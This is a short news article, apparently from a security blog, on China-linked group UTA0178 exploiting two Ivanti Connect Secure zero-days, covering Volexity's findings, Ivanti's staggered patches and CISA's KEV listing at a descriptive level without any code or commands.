In a recent cybersecurity revelation, Ivanti Connect Secure (ICS) and Policy Secure faced a sophisticated cyber-attack orchestrated by suspected China-linked nation-state actors.
Identified by Volexity in the second week of December 2023, the hacking group UTA0178 exploited a pair of zero-day vulnerabilities, demonstrating the prowess to breach less than 10 customers.
The vulnerabilities, CVE-2023-46805 and CVE-2024-21887, allowed unauthenticated command execution on ICS devices. CVE-2023-46805 presented an authentication bypass vulnerability, enabling remote access to restricted resources. Meanwhile, CVE-2024-21887, a command injection flaw, empowered authenticated administrators to execute arbitrary commands on the appliance.
The combination of these exploits formed a potent chain, requiring no authentication for threat actors to manipulate the system. Ivanti, in response, noted attempts by the attackers to manipulate its internal integrity checker (ICT), emphasizing the severity of the breach.
Ivanti has swiftly responded by announcing that patches will be released in a staggered manner starting from the week of January 22, 2024. In the interim, users are strongly advised to apply a workaround to bolster their defense against potential threats.
Volexity’s analysis of the incident revealed that the attackers employed the twin flaws to perform various malicious activities, including stealing configuration data, modifying files, downloading remote files, and establishing reverse tunnels from the ICS VPN appliance. Notably, the attackers altered a legitimate CGI file and a JavaScript file, leading to command execution, keystroke logging, and the exfiltration of user credentials.
The severity of the situation prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Federal agencies are urged to apply fixes by January 31, 2024.
Volexity emphasized the growing threat to internet-accessible systems, particularly critical devices like VPN appliances and firewalls. These systems, often targeted due to their strategic network placement, highlight the need for organizations to implement robust monitoring strategies and rapid response mechanisms. As technology evolves, staying ahead of cyber threats remains imperative for safeguarding sensitive networks and data.
Pingback: Russian Hackers Attack Ukraine Telecom Giants For Almost a Year -
Pingback: CISA's Response to Ivanti's Zero Day Threats